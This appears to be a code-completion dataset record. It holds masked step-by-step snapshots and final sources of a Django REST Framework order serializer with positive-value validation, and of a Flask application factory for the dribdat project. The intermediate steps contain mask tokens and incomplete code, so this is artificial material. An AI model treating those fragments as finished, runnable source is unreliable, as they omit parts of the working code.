if value <= 0:
raise serializers.ValidationError(
"Please, enter a positive quantity")
return value
def validate_total_price_product(self, value):
if value <= 0:
raise serializers.ValidationError(
"Please, enter a positive total price")
return value
    # 2) object-level validation across several fields
def validate(self, data):
if data['quantity'] <= 0 and data['total_price_product'] <= 0:
raise serializers.ValidationError(
"Please, enter a positive value")
return data
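# --- Usage sketch (editor's illustration, not part of the original) ---
# In DRF, the field-level validate_<field> methods run during field
# validation, before the object-level validate(); roughly:
#
#     s = OrderProductSerializer(data={'quantity': -1,
#                                      'total_price_product': 10})
#     s.is_valid()          # False (other required model fields, omitted
#                           # here for brevity, would also be reported)
#     s.errors['quantity']  # ['Please, enter a positive quantity']
#
# Note that the object-level check (way 2) fires only when *both* values
# are non-positive, since it joins the conditions with `and`.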
|
normal
|
{
"blob_id": "9c14f024b25c5014567405535dbe5a6c787cfe28",
"index": 6529,
"step-1": "<mask token>\n\n\nclass OrderProductSerializer(serializers.ModelSerializer):\n\n\n class Meta:\n model = ShoppingCart\n fields = '__all__'\n\n def validate_quantity(self, value):\n if value <= 0:\n raise serializers.ValidationError(\n 'Please, enter a positive quantity')\n return value\n <mask token>\n <mask token>\n",
"step-2": "<mask token>\n\n\nclass OrderProductSerializer(serializers.ModelSerializer):\n\n\n class Meta:\n model = ShoppingCart\n fields = '__all__'\n\n def validate_quantity(self, value):\n if value <= 0:\n raise serializers.ValidationError(\n 'Please, enter a positive quantity')\n return value\n\n def validate_total_price_product(self, value):\n if value <= 0:\n raise serializers.ValidationError(\n 'Please, enter a positive total price')\n return value\n <mask token>\n",
"step-3": "<mask token>\n\n\nclass OrderSerializer(serializers.ModelSerializer):\n\n\n class Meta:\n model = Order\n fields = '__all__'\n\n\nclass OrderProductSerializer(serializers.ModelSerializer):\n\n\n class Meta:\n model = ShoppingCart\n fields = '__all__'\n\n def validate_quantity(self, value):\n if value <= 0:\n raise serializers.ValidationError(\n 'Please, enter a positive quantity')\n return value\n\n def validate_total_price_product(self, value):\n if value <= 0:\n raise serializers.ValidationError(\n 'Please, enter a positive total price')\n return value\n\n def validate(self, data):\n if data['quantity'] <= 0 and data['total_price_product'] <= 0:\n raise serializers.ValidationError('Please, enter a positive value')\n return data\n",
"step-4": "from abc import ABC\nfrom rest_framework import serializers\nfrom shopping_cars.models import Order, ShoppingCart\n\n\nclass OrderSerializer(serializers.ModelSerializer):\n\n\n class Meta:\n model = Order\n fields = '__all__'\n\n\nclass OrderProductSerializer(serializers.ModelSerializer):\n\n\n class Meta:\n model = ShoppingCart\n fields = '__all__'\n\n def validate_quantity(self, value):\n if value <= 0:\n raise serializers.ValidationError(\n 'Please, enter a positive quantity')\n return value\n\n def validate_total_price_product(self, value):\n if value <= 0:\n raise serializers.ValidationError(\n 'Please, enter a positive total price')\n return value\n\n def validate(self, data):\n if data['quantity'] <= 0 and data['total_price_product'] <= 0:\n raise serializers.ValidationError('Please, enter a positive value')\n return data\n",
"step-5": "from abc import ABC\nfrom rest_framework import serializers\nfrom shopping_cars.models import Order, ShoppingCart\n\n\nclass OrderSerializer(serializers.ModelSerializer):\n class Meta:\n model = Order\n fields = '__all__'\n\n\nclass OrderProductSerializer(serializers.ModelSerializer):\n class Meta:\n model = ShoppingCart\n fields = '__all__'\n\n # ways to validate\n # #1\n def validate_quantity(self, value):\n if value <= 0:\n raise serializers.ValidationError(\n \"Please, enter a positive quantity\")\n return value\n\n def validate_total_price_product(self, value):\n if value <= 0:\n raise serializers.ValidationError(\n \"Please, enter a positive total price\")\n return value\n\n # #2\n def validate(self, data):\n if data['quantity'] <= 0 and data['total_price_product'] <= 0:\n raise serializers.ValidationError(\n \"Please, enter a positive value\")\n return data\n",
"step-ids": [
2,
3,
5,
6,
7
]
}
|
[
2,
3,
5,
6,
7
] |
<|reserved_special_token_0|>
def register_extensions(app):
"""Register Flask extensions."""
assets.init_app(app)
hashing.init_app(app)
cache.init_app(app)
db.init_app(app)
login_manager.init_app(app)
migrate.init_app(app, db)
init_mailman(app)
init_talisman(app)
return None
<|reserved_special_token_0|>
def register_blueprints(app):
"""Register Flask blueprints."""
app.register_blueprint(public.views.blueprint)
app.register_blueprint(public.project.blueprint)
app.register_blueprint(public.auth.blueprint)
app.register_blueprint(public.api.blueprint)
app.register_blueprint(admin.views.blueprint)
return None
<|reserved_special_token_0|>
def register_shellcontext(app):
"""Register shell context objects."""
def shell_context():
"""Shell context objects."""
from dribdat.user.models import User
return {'db': db, 'User': User}
app.shell_context_processor(shell_context)
<|reserved_special_token_0|>
def register_filters(app):
"""Register filters for templates."""
    Misaka(app, autolink=True, fenced_code=True, strikethrough=True,
           tables=True)
app.oembed_providers = bootstrap_basic()
@app.template_filter()
def onebox(value):
return make_oembedplus(value, app.oembed_providers, maxwidth=600,
maxheight=400)
app.tz = timezone(app.config['TIME_ZONE'])
    app.jinja_env.filters['quote_plus'] = lambda u: quote_plus(u or '', ':/?&=')
@app.template_filter()
def since_date(value):
return timesince(value)
@app.template_filter()
def until_date(value):
return timesince(value, default='now!', until=True)
@app.template_filter()
def format_date(value, format='%d.%m.%Y'):
if value is None:
return ''
return value.strftime(format)
@app.template_filter()
def format_datetime(value, format='%d.%m.%Y %H:%M'):
if value is None:
return ''
return value.strftime(format)
def register_loggers(app):
"""Initialize and configure logging."""
if 'DEBUG' in app.config and not app.config['DEBUG']:
import logging
stream_handler = logging.StreamHandler()
app.logger.addHandler(stream_handler)
app.logger.setLevel(logging.INFO)
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
def init_app(config_object=ProdConfig):
"""Define an application factory.
See: http://flask.pocoo.org/docs/patterns/appfactories/
:param config_object: The configuration object to use.
"""
app = Flask(__name__)
app.config.from_object(config_object)
if app.config['SERVER_CORS']:
CORS(app, resources={'/api/*': {'origins': '*'}})
app.config['CORS_HEADERS'] = 'Content-Type'
if app.config['SERVER_PROXY']:
app.wsgi_app = ProxyFix(app, x_for=1, x_proto=1, x_host=1)
else:
app.wsgi_app = WhiteNoise(app.wsgi_app, prefix='static/')
for static in ('css', 'img', 'js', 'public'):
app.wsgi_app.add_files('dribdat/static/' + static)
register_extensions(app)
register_blueprints(app)
register_oauthhandlers(app)
register_errorhandlers(app)
register_filters(app)
register_loggers(app)
register_shellcontext(app)
register_commands(app)
register_caching(app)
return app
def register_extensions(app):
"""Register Flask extensions."""
assets.init_app(app)
hashing.init_app(app)
cache.init_app(app)
db.init_app(app)
login_manager.init_app(app)
migrate.init_app(app, db)
init_mailman(app)
init_talisman(app)
return None
<|reserved_special_token_0|>
def register_blueprints(app):
"""Register Flask blueprints."""
app.register_blueprint(public.views.blueprint)
app.register_blueprint(public.project.blueprint)
app.register_blueprint(public.auth.blueprint)
app.register_blueprint(public.api.blueprint)
app.register_blueprint(admin.views.blueprint)
return None
def register_oauthhandlers(app):
"""Set up OAuth handlers based on configuration."""
blueprint = get_auth_blueprint(app)
if blueprint is not None:
app.register_blueprint(blueprint, url_prefix='/oauth')
def register_errorhandlers(app):
"""Register error handlers."""
def render_error(error):
"""Render error template."""
error_code = getattr(error, 'code', 500)
return render_template('{0}.html'.format(error_code)), error_code
for errcode in [401, 404, 500]:
app.errorhandler(errcode)(render_error)
return None
def register_shellcontext(app):
"""Register shell context objects."""
def shell_context():
"""Shell context objects."""
from dribdat.user.models import User
return {'db': db, 'User': User}
app.shell_context_processor(shell_context)
<|reserved_special_token_0|>
def register_filters(app):
"""Register filters for templates."""
    Misaka(app, autolink=True, fenced_code=True, strikethrough=True,
           tables=True)
app.oembed_providers = bootstrap_basic()
@app.template_filter()
def onebox(value):
return make_oembedplus(value, app.oembed_providers, maxwidth=600,
maxheight=400)
app.tz = timezone(app.config['TIME_ZONE'])
    app.jinja_env.filters['quote_plus'] = lambda u: quote_plus(u or '', ':/?&=')
@app.template_filter()
def since_date(value):
return timesince(value)
@app.template_filter()
def until_date(value):
return timesince(value, default='now!', until=True)
@app.template_filter()
def format_date(value, format='%d.%m.%Y'):
if value is None:
return ''
return value.strftime(format)
@app.template_filter()
def format_datetime(value, format='%d.%m.%Y %H:%M'):
if value is None:
return ''
return value.strftime(format)
def register_loggers(app):
"""Initialize and configure logging."""
if 'DEBUG' in app.config and not app.config['DEBUG']:
import logging
stream_handler = logging.StreamHandler()
app.logger.addHandler(stream_handler)
app.logger.setLevel(logging.INFO)
def register_caching(app):
"""Prevent cached responses in debug."""
if 'DEBUG' in app.config and app.config['DEBUG']:
@app.after_request
def after_request(response):
            response.headers['Cache-Control'] = (
                'no-cache, no-store, must-revalidate, public, max-age=0')
response.headers['Expires'] = 0
response.headers['Pragma'] = 'no-cache'
return response
<|reserved_special_token_1|>
<|reserved_special_token_0|>
def init_app(config_object=ProdConfig):
"""Define an application factory.
See: http://flask.pocoo.org/docs/patterns/appfactories/
:param config_object: The configuration object to use.
"""
app = Flask(__name__)
app.config.from_object(config_object)
if app.config['SERVER_CORS']:
CORS(app, resources={'/api/*': {'origins': '*'}})
app.config['CORS_HEADERS'] = 'Content-Type'
if app.config['SERVER_PROXY']:
app.wsgi_app = ProxyFix(app, x_for=1, x_proto=1, x_host=1)
else:
app.wsgi_app = WhiteNoise(app.wsgi_app, prefix='static/')
for static in ('css', 'img', 'js', 'public'):
app.wsgi_app.add_files('dribdat/static/' + static)
register_extensions(app)
register_blueprints(app)
register_oauthhandlers(app)
register_errorhandlers(app)
register_filters(app)
register_loggers(app)
register_shellcontext(app)
register_commands(app)
register_caching(app)
return app
def register_extensions(app):
"""Register Flask extensions."""
assets.init_app(app)
hashing.init_app(app)
cache.init_app(app)
db.init_app(app)
login_manager.init_app(app)
migrate.init_app(app, db)
init_mailman(app)
init_talisman(app)
return None
<|reserved_special_token_0|>
def init_talisman(app):
"""Initialize Talisman support."""
if 'SERVER_SSL' in app.config and app.config['SERVER_SSL']:
Talisman(app, content_security_policy=app.config['CSP_DIRECTIVES'],
frame_options_allow_from='*')
def register_blueprints(app):
"""Register Flask blueprints."""
app.register_blueprint(public.views.blueprint)
app.register_blueprint(public.project.blueprint)
app.register_blueprint(public.auth.blueprint)
app.register_blueprint(public.api.blueprint)
app.register_blueprint(admin.views.blueprint)
return None
def register_oauthhandlers(app):
"""Set up OAuth handlers based on configuration."""
blueprint = get_auth_blueprint(app)
if blueprint is not None:
app.register_blueprint(blueprint, url_prefix='/oauth')
def register_errorhandlers(app):
"""Register error handlers."""
def render_error(error):
"""Render error template."""
error_code = getattr(error, 'code', 500)
return render_template('{0}.html'.format(error_code)), error_code
for errcode in [401, 404, 500]:
app.errorhandler(errcode)(render_error)
return None
def register_shellcontext(app):
"""Register shell context objects."""
def shell_context():
"""Shell context objects."""
from dribdat.user.models import User
return {'db': db, 'User': User}
app.shell_context_processor(shell_context)
<|reserved_special_token_0|>
def register_filters(app):
"""Register filters for templates."""
    Misaka(app, autolink=True, fenced_code=True, strikethrough=True,
           tables=True)
app.oembed_providers = bootstrap_basic()
@app.template_filter()
def onebox(value):
return make_oembedplus(value, app.oembed_providers, maxwidth=600,
maxheight=400)
app.tz = timezone(app.config['TIME_ZONE'])
    app.jinja_env.filters['quote_plus'] = lambda u: quote_plus(u or '', ':/?&=')
@app.template_filter()
def since_date(value):
return timesince(value)
@app.template_filter()
def until_date(value):
return timesince(value, default='now!', until=True)
@app.template_filter()
def format_date(value, format='%d.%m.%Y'):
if value is None:
return ''
return value.strftime(format)
@app.template_filter()
def format_datetime(value, format='%d.%m.%Y %H:%M'):
if value is None:
return ''
return value.strftime(format)
def register_loggers(app):
"""Initialize and configure logging."""
if 'DEBUG' in app.config and not app.config['DEBUG']:
import logging
stream_handler = logging.StreamHandler()
app.logger.addHandler(stream_handler)
app.logger.setLevel(logging.INFO)
def register_caching(app):
"""Prevent cached responses in debug."""
if 'DEBUG' in app.config and app.config['DEBUG']:
@app.after_request
def after_request(response):
            response.headers['Cache-Control'] = (
                'no-cache, no-store, must-revalidate, public, max-age=0')
response.headers['Expires'] = 0
response.headers['Pragma'] = 'no-cache'
return response
<|reserved_special_token_1|>
<|reserved_special_token_0|>
def init_app(config_object=ProdConfig):
"""Define an application factory.
See: http://flask.pocoo.org/docs/patterns/appfactories/
:param config_object: The configuration object to use.
"""
app = Flask(__name__)
app.config.from_object(config_object)
if app.config['SERVER_CORS']:
CORS(app, resources={'/api/*': {'origins': '*'}})
app.config['CORS_HEADERS'] = 'Content-Type'
if app.config['SERVER_PROXY']:
app.wsgi_app = ProxyFix(app, x_for=1, x_proto=1, x_host=1)
else:
app.wsgi_app = WhiteNoise(app.wsgi_app, prefix='static/')
for static in ('css', 'img', 'js', 'public'):
app.wsgi_app.add_files('dribdat/static/' + static)
register_extensions(app)
register_blueprints(app)
register_oauthhandlers(app)
register_errorhandlers(app)
register_filters(app)
register_loggers(app)
register_shellcontext(app)
register_commands(app)
register_caching(app)
return app
def register_extensions(app):
"""Register Flask extensions."""
assets.init_app(app)
hashing.init_app(app)
cache.init_app(app)
db.init_app(app)
login_manager.init_app(app)
migrate.init_app(app, db)
init_mailman(app)
init_talisman(app)
return None
def init_mailman(app):
"""Initialize mailer support."""
if 'MAIL_SERVER' in app.config and app.config['MAIL_SERVER']:
if not app.config['MAIL_DEFAULT_SENDER']:
app.logger.warn('MAIL_DEFAULT_SENDER is required to send email')
else:
mail = Mail()
mail.init_app(app)
def init_talisman(app):
"""Initialize Talisman support."""
if 'SERVER_SSL' in app.config and app.config['SERVER_SSL']:
Talisman(app, content_security_policy=app.config['CSP_DIRECTIVES'],
frame_options_allow_from='*')
def register_blueprints(app):
"""Register Flask blueprints."""
app.register_blueprint(public.views.blueprint)
app.register_blueprint(public.project.blueprint)
app.register_blueprint(public.auth.blueprint)
app.register_blueprint(public.api.blueprint)
app.register_blueprint(admin.views.blueprint)
return None
def register_oauthhandlers(app):
"""Set up OAuth handlers based on configuration."""
blueprint = get_auth_blueprint(app)
if blueprint is not None:
app.register_blueprint(blueprint, url_prefix='/oauth')
def register_errorhandlers(app):
"""Register error handlers."""
def render_error(error):
"""Render error template."""
error_code = getattr(error, 'code', 500)
return render_template('{0}.html'.format(error_code)), error_code
for errcode in [401, 404, 500]:
app.errorhandler(errcode)(render_error)
return None
def register_shellcontext(app):
"""Register shell context objects."""
def shell_context():
"""Shell context objects."""
from dribdat.user.models import User
return {'db': db, 'User': User}
app.shell_context_processor(shell_context)
def register_commands(app):
"""Register Click commands."""
app.cli.add_command(commands.lint)
app.cli.add_command(commands.clean)
app.cli.add_command(commands.urls)
def register_filters(app):
"""Register filters for templates."""
    Misaka(app, autolink=True, fenced_code=True, strikethrough=True,
           tables=True)
app.oembed_providers = bootstrap_basic()
@app.template_filter()
def onebox(value):
return make_oembedplus(value, app.oembed_providers, maxwidth=600,
maxheight=400)
app.tz = timezone(app.config['TIME_ZONE'])
    app.jinja_env.filters['quote_plus'] = lambda u: quote_plus(u or '', ':/?&=')
@app.template_filter()
def since_date(value):
return timesince(value)
@app.template_filter()
def until_date(value):
return timesince(value, default='now!', until=True)
@app.template_filter()
def format_date(value, format='%d.%m.%Y'):
if value is None:
return ''
return value.strftime(format)
@app.template_filter()
def format_datetime(value, format='%d.%m.%Y %H:%M'):
if value is None:
return ''
return value.strftime(format)
def register_loggers(app):
"""Initialize and configure logging."""
if 'DEBUG' in app.config and not app.config['DEBUG']:
import logging
stream_handler = logging.StreamHandler()
app.logger.addHandler(stream_handler)
app.logger.setLevel(logging.INFO)
def register_caching(app):
"""Prevent cached responses in debug."""
if 'DEBUG' in app.config and app.config['DEBUG']:
@app.after_request
def after_request(response):
            response.headers['Cache-Control'] = (
                'no-cache, no-store, must-revalidate, public, max-age=0')
response.headers['Expires'] = 0
response.headers['Pragma'] = 'no-cache'
return response
<|reserved_special_token_1|>
# -*- coding: utf-8 -*-
"""The app module, containing the app factory function."""
from flask import Flask, render_template
from flask_cors import CORS
from flask_misaka import Misaka
from flask_mailman import Mail
from flask_talisman import Talisman
from werkzeug.middleware.proxy_fix import ProxyFix
from micawber.providers import bootstrap_basic
from whitenoise import WhiteNoise
from pytz import timezone
from urllib.parse import quote_plus
from dribdat import commands, public, admin
from dribdat.assets import assets # noqa: I005
from dribdat.sso import get_auth_blueprint
from dribdat.extensions import (
hashing,
cache,
db,
login_manager,
migrate,
)
from dribdat.settings import ProdConfig # noqa: I005
from dribdat.utils import timesince
from dribdat.onebox import make_oembedplus
def init_app(config_object=ProdConfig):
"""Define an application factory.
See: http://flask.pocoo.org/docs/patterns/appfactories/
:param config_object: The configuration object to use.
"""
app = Flask(__name__)
app.config.from_object(config_object)
# Set up cross-site access to the API
if app.config['SERVER_CORS']:
CORS(app, resources={r"/api/*": {"origins": "*"}})
app.config['CORS_HEADERS'] = 'Content-Type'
# Set up using an external proxy/static server
if app.config['SERVER_PROXY']:
app.wsgi_app = ProxyFix(app, x_for=1, x_proto=1, x_host=1)
else:
# Internally optimize static file hosting
app.wsgi_app = WhiteNoise(app.wsgi_app, prefix='static/')
for static in ('css', 'img', 'js', 'public'):
app.wsgi_app.add_files('dribdat/static/' + static)
register_extensions(app)
register_blueprints(app)
register_oauthhandlers(app)
register_errorhandlers(app)
register_filters(app)
register_loggers(app)
register_shellcontext(app)
register_commands(app)
register_caching(app)
return app
def register_extensions(app):
"""Register Flask extensions."""
assets.init_app(app)
hashing.init_app(app)
cache.init_app(app)
db.init_app(app)
login_manager.init_app(app)
migrate.init_app(app, db)
init_mailman(app)
init_talisman(app)
return None
def init_mailman(app):
"""Initialize mailer support."""
if 'MAIL_SERVER' in app.config and app.config['MAIL_SERVER']:
if not app.config['MAIL_DEFAULT_SENDER']:
app.logger.warn('MAIL_DEFAULT_SENDER is required to send email')
else:
mail = Mail()
mail.init_app(app)
def init_talisman(app):
"""Initialize Talisman support."""
if 'SERVER_SSL' in app.config and app.config['SERVER_SSL']:
Talisman(app,
content_security_policy=app.config['CSP_DIRECTIVES'],
frame_options_allow_from='*')
def register_blueprints(app):
"""Register Flask blueprints."""
app.register_blueprint(public.views.blueprint)
app.register_blueprint(public.project.blueprint)
app.register_blueprint(public.auth.blueprint)
app.register_blueprint(public.api.blueprint)
app.register_blueprint(admin.views.blueprint)
return None
def register_oauthhandlers(app):
"""Set up OAuth handlers based on configuration."""
blueprint = get_auth_blueprint(app)
if blueprint is not None:
app.register_blueprint(blueprint, url_prefix="/oauth")
def register_errorhandlers(app):
"""Register error handlers."""
def render_error(error):
"""Render error template."""
# If a HTTPException, pull the `code` attribute; default to 500
error_code = getattr(error, 'code', 500)
return render_template('{0}.html'.format(error_code)), error_code
for errcode in [401, 404, 500]:
app.errorhandler(errcode)(render_error)
return None
def register_shellcontext(app):
"""Register shell context objects."""
def shell_context():
"""Shell context objects."""
from dribdat.user.models import User
return {
'db': db,
'User': User}
app.shell_context_processor(shell_context)
def register_commands(app):
"""Register Click commands."""
app.cli.add_command(commands.lint)
app.cli.add_command(commands.clean)
app.cli.add_command(commands.urls)
def register_filters(app):
"""Register filters for templates."""
#
# Conversion of Markdown to HTML
Misaka(app, autolink=True, fenced_code=True,
strikethrough=True, tables=True)
# Registration of handlers for micawber
app.oembed_providers = bootstrap_basic()
@app.template_filter()
def onebox(value):
return make_oembedplus(
value, app.oembed_providers, maxwidth=600, maxheight=400
)
# Timezone helper
app.tz = timezone(app.config['TIME_ZONE'])
# Lambda filters for safe image_url's
app.jinja_env.filters['quote_plus'] = lambda u: quote_plus(u or '', ':/?&=')
# Custom filters
@app.template_filter()
def since_date(value):
return timesince(value)
@app.template_filter()
def until_date(value):
return timesince(value, default="now!", until=True)
@app.template_filter()
def format_date(value, format='%d.%m.%Y'):
if value is None: return ''
return value.strftime(format)
@app.template_filter()
def format_datetime(value, format='%d.%m.%Y %H:%M'):
if value is None: return ''
return value.strftime(format)
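# --- Editor's note (illustrative, not part of the original) ---
# Once registered, these filters are usable from Jinja templates, e.g.:
#
#     {{ event.starts_at | format_datetime }}
#     {{ project.updated_at | since_date }}
#     {{ event.starts_at | until_date }}
#
# The attribute names above are made up; any datetime value works.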
def register_loggers(app):
"""Initialize and configure logging."""
if 'DEBUG' in app.config and not app.config['DEBUG']:
import logging
stream_handler = logging.StreamHandler()
app.logger.addHandler(stream_handler)
app.logger.setLevel(logging.INFO)
def register_caching(app):
"""Prevent cached responses in debug."""
if 'DEBUG' in app.config and app.config['DEBUG']:
@app.after_request
def after_request(response):
response.headers["Cache-Control"] = "no-cache, no-store, must-revalidate, public, max-age=0"
response.headers["Expires"] = 0
response.headers["Pragma"] = "no-cache"
return response
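# --- Usage sketch (editor's illustration, not part of the original record) ---
# The factory is typically driven from a WSGI entry point or the Flask CLI.
# A minimal sketch, assuming this module is importable as `dribdat.app` and
# that a DevConfig counterpart exists alongside ProdConfig in dribdat.settings:
#
#     from dribdat.app import init_app
#     from dribdat.settings import DevConfig
#
#     app = init_app(DevConfig)
#     app.run(debug=True)   # or serve `app` via gunicorn/uwsgi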
|
flexible
|
{
"blob_id": "2257f73a290dfd428a874e963c26e51f1c1f1efa",
"index": 927,
"step-1": "<mask token>\n\n\ndef register_extensions(app):\n \"\"\"Register Flask extensions.\"\"\"\n assets.init_app(app)\n hashing.init_app(app)\n cache.init_app(app)\n db.init_app(app)\n login_manager.init_app(app)\n migrate.init_app(app, db)\n init_mailman(app)\n init_talisman(app)\n return None\n\n\n<mask token>\n\n\ndef register_blueprints(app):\n \"\"\"Register Flask blueprints.\"\"\"\n app.register_blueprint(public.views.blueprint)\n app.register_blueprint(public.project.blueprint)\n app.register_blueprint(public.auth.blueprint)\n app.register_blueprint(public.api.blueprint)\n app.register_blueprint(admin.views.blueprint)\n return None\n\n\n<mask token>\n\n\ndef register_shellcontext(app):\n \"\"\"Register shell context objects.\"\"\"\n\n def shell_context():\n \"\"\"Shell context objects.\"\"\"\n from dribdat.user.models import User\n return {'db': db, 'User': User}\n app.shell_context_processor(shell_context)\n\n\n<mask token>\n\n\ndef register_filters(app):\n \"\"\"Register filters for templates.\"\"\"\n Misaka(app, autolink=True, fenced_code=True, strikethrough=True, tables\n =True)\n app.oembed_providers = bootstrap_basic()\n\n @app.template_filter()\n def onebox(value):\n return make_oembedplus(value, app.oembed_providers, maxwidth=600,\n maxheight=400)\n app.tz = timezone(app.config['TIME_ZONE'])\n app.jinja_env.filters['quote_plus'] = lambda u: quote_plus(u or '', ':/?&='\n )\n\n @app.template_filter()\n def since_date(value):\n return timesince(value)\n\n @app.template_filter()\n def until_date(value):\n return timesince(value, default='now!', until=True)\n\n @app.template_filter()\n def format_date(value, format='%d.%m.%Y'):\n if value is None:\n return ''\n return value.strftime(format)\n\n @app.template_filter()\n def format_datetime(value, format='%d.%m.%Y %H:%M'):\n if value is None:\n return ''\n return value.strftime(format)\n\n\ndef register_loggers(app):\n \"\"\"Initialize and configure logging.\"\"\"\n if 'DEBUG' in app.config and not app.config['DEBUG']:\n import logging\n stream_handler = logging.StreamHandler()\n app.logger.addHandler(stream_handler)\n app.logger.setLevel(logging.INFO)\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\ndef init_app(config_object=ProdConfig):\n \"\"\"Define an application factory.\n\n See: http://flask.pocoo.org/docs/patterns/appfactories/\n\n :param config_object: The configuration object to use.\n \"\"\"\n app = Flask(__name__)\n app.config.from_object(config_object)\n if app.config['SERVER_CORS']:\n CORS(app, resources={'/api/*': {'origins': '*'}})\n app.config['CORS_HEADERS'] = 'Content-Type'\n if app.config['SERVER_PROXY']:\n app.wsgi_app = ProxyFix(app, x_for=1, x_proto=1, x_host=1)\n else:\n app.wsgi_app = WhiteNoise(app.wsgi_app, prefix='static/')\n for static in ('css', 'img', 'js', 'public'):\n app.wsgi_app.add_files('dribdat/static/' + static)\n register_extensions(app)\n register_blueprints(app)\n register_oauthhandlers(app)\n register_errorhandlers(app)\n register_filters(app)\n register_loggers(app)\n register_shellcontext(app)\n register_commands(app)\n register_caching(app)\n return app\n\n\ndef register_extensions(app):\n \"\"\"Register Flask extensions.\"\"\"\n assets.init_app(app)\n hashing.init_app(app)\n cache.init_app(app)\n db.init_app(app)\n login_manager.init_app(app)\n migrate.init_app(app, db)\n init_mailman(app)\n init_talisman(app)\n return None\n\n\n<mask token>\n\n\ndef register_blueprints(app):\n \"\"\"Register Flask blueprints.\"\"\"\n app.register_blueprint(public.views.blueprint)\n app.register_blueprint(public.project.blueprint)\n app.register_blueprint(public.auth.blueprint)\n app.register_blueprint(public.api.blueprint)\n app.register_blueprint(admin.views.blueprint)\n return None\n\n\ndef register_oauthhandlers(app):\n \"\"\"Set up OAuth handlers based on configuration.\"\"\"\n blueprint = get_auth_blueprint(app)\n if blueprint is not None:\n app.register_blueprint(blueprint, url_prefix='/oauth')\n\n\ndef register_errorhandlers(app):\n \"\"\"Register error handlers.\"\"\"\n\n def render_error(error):\n \"\"\"Render error template.\"\"\"\n error_code = getattr(error, 'code', 500)\n return render_template('{0}.html'.format(error_code)), error_code\n for errcode in [401, 404, 500]:\n app.errorhandler(errcode)(render_error)\n return None\n\n\ndef register_shellcontext(app):\n \"\"\"Register shell context objects.\"\"\"\n\n def shell_context():\n \"\"\"Shell context objects.\"\"\"\n from dribdat.user.models import User\n return {'db': db, 'User': User}\n app.shell_context_processor(shell_context)\n\n\n<mask token>\n\n\ndef register_filters(app):\n \"\"\"Register filters for templates.\"\"\"\n Misaka(app, autolink=True, fenced_code=True, strikethrough=True, tables\n =True)\n app.oembed_providers = bootstrap_basic()\n\n @app.template_filter()\n def onebox(value):\n return make_oembedplus(value, app.oembed_providers, maxwidth=600,\n maxheight=400)\n app.tz = timezone(app.config['TIME_ZONE'])\n app.jinja_env.filters['quote_plus'] = lambda u: quote_plus(u or '', ':/?&='\n )\n\n @app.template_filter()\n def since_date(value):\n return timesince(value)\n\n @app.template_filter()\n def until_date(value):\n return timesince(value, default='now!', until=True)\n\n @app.template_filter()\n def format_date(value, format='%d.%m.%Y'):\n if value is None:\n return ''\n return value.strftime(format)\n\n @app.template_filter()\n def format_datetime(value, format='%d.%m.%Y %H:%M'):\n if value is None:\n return ''\n return value.strftime(format)\n\n\ndef register_loggers(app):\n \"\"\"Initialize and configure logging.\"\"\"\n if 'DEBUG' in app.config and not app.config['DEBUG']:\n import logging\n stream_handler = logging.StreamHandler()\n 
app.logger.addHandler(stream_handler)\n app.logger.setLevel(logging.INFO)\n\n\ndef register_caching(app):\n \"\"\"Prevent cached responses in debug.\"\"\"\n if 'DEBUG' in app.config and app.config['DEBUG']:\n\n @app.after_request\n def after_request(response):\n response.headers['Cache-Control'\n ] = 'no-cache, no-store, must-revalidate, public, max-age=0'\n response.headers['Expires'] = 0\n response.headers['Pragma'] = 'no-cache'\n return response\n",
"step-3": "<mask token>\n\n\ndef init_app(config_object=ProdConfig):\n \"\"\"Define an application factory.\n\n See: http://flask.pocoo.org/docs/patterns/appfactories/\n\n :param config_object: The configuration object to use.\n \"\"\"\n app = Flask(__name__)\n app.config.from_object(config_object)\n if app.config['SERVER_CORS']:\n CORS(app, resources={'/api/*': {'origins': '*'}})\n app.config['CORS_HEADERS'] = 'Content-Type'\n if app.config['SERVER_PROXY']:\n app.wsgi_app = ProxyFix(app, x_for=1, x_proto=1, x_host=1)\n else:\n app.wsgi_app = WhiteNoise(app.wsgi_app, prefix='static/')\n for static in ('css', 'img', 'js', 'public'):\n app.wsgi_app.add_files('dribdat/static/' + static)\n register_extensions(app)\n register_blueprints(app)\n register_oauthhandlers(app)\n register_errorhandlers(app)\n register_filters(app)\n register_loggers(app)\n register_shellcontext(app)\n register_commands(app)\n register_caching(app)\n return app\n\n\ndef register_extensions(app):\n \"\"\"Register Flask extensions.\"\"\"\n assets.init_app(app)\n hashing.init_app(app)\n cache.init_app(app)\n db.init_app(app)\n login_manager.init_app(app)\n migrate.init_app(app, db)\n init_mailman(app)\n init_talisman(app)\n return None\n\n\n<mask token>\n\n\ndef init_talisman(app):\n \"\"\"Initialize Talisman support.\"\"\"\n if 'SERVER_SSL' in app.config and app.config['SERVER_SSL']:\n Talisman(app, content_security_policy=app.config['CSP_DIRECTIVES'],\n frame_options_allow_from='*')\n\n\ndef register_blueprints(app):\n \"\"\"Register Flask blueprints.\"\"\"\n app.register_blueprint(public.views.blueprint)\n app.register_blueprint(public.project.blueprint)\n app.register_blueprint(public.auth.blueprint)\n app.register_blueprint(public.api.blueprint)\n app.register_blueprint(admin.views.blueprint)\n return None\n\n\ndef register_oauthhandlers(app):\n \"\"\"Set up OAuth handlers based on configuration.\"\"\"\n blueprint = get_auth_blueprint(app)\n if blueprint is not None:\n app.register_blueprint(blueprint, url_prefix='/oauth')\n\n\ndef register_errorhandlers(app):\n \"\"\"Register error handlers.\"\"\"\n\n def render_error(error):\n \"\"\"Render error template.\"\"\"\n error_code = getattr(error, 'code', 500)\n return render_template('{0}.html'.format(error_code)), error_code\n for errcode in [401, 404, 500]:\n app.errorhandler(errcode)(render_error)\n return None\n\n\ndef register_shellcontext(app):\n \"\"\"Register shell context objects.\"\"\"\n\n def shell_context():\n \"\"\"Shell context objects.\"\"\"\n from dribdat.user.models import User\n return {'db': db, 'User': User}\n app.shell_context_processor(shell_context)\n\n\n<mask token>\n\n\ndef register_filters(app):\n \"\"\"Register filters for templates.\"\"\"\n Misaka(app, autolink=True, fenced_code=True, strikethrough=True, tables\n =True)\n app.oembed_providers = bootstrap_basic()\n\n @app.template_filter()\n def onebox(value):\n return make_oembedplus(value, app.oembed_providers, maxwidth=600,\n maxheight=400)\n app.tz = timezone(app.config['TIME_ZONE'])\n app.jinja_env.filters['quote_plus'] = lambda u: quote_plus(u or '', ':/?&='\n )\n\n @app.template_filter()\n def since_date(value):\n return timesince(value)\n\n @app.template_filter()\n def until_date(value):\n return timesince(value, default='now!', until=True)\n\n @app.template_filter()\n def format_date(value, 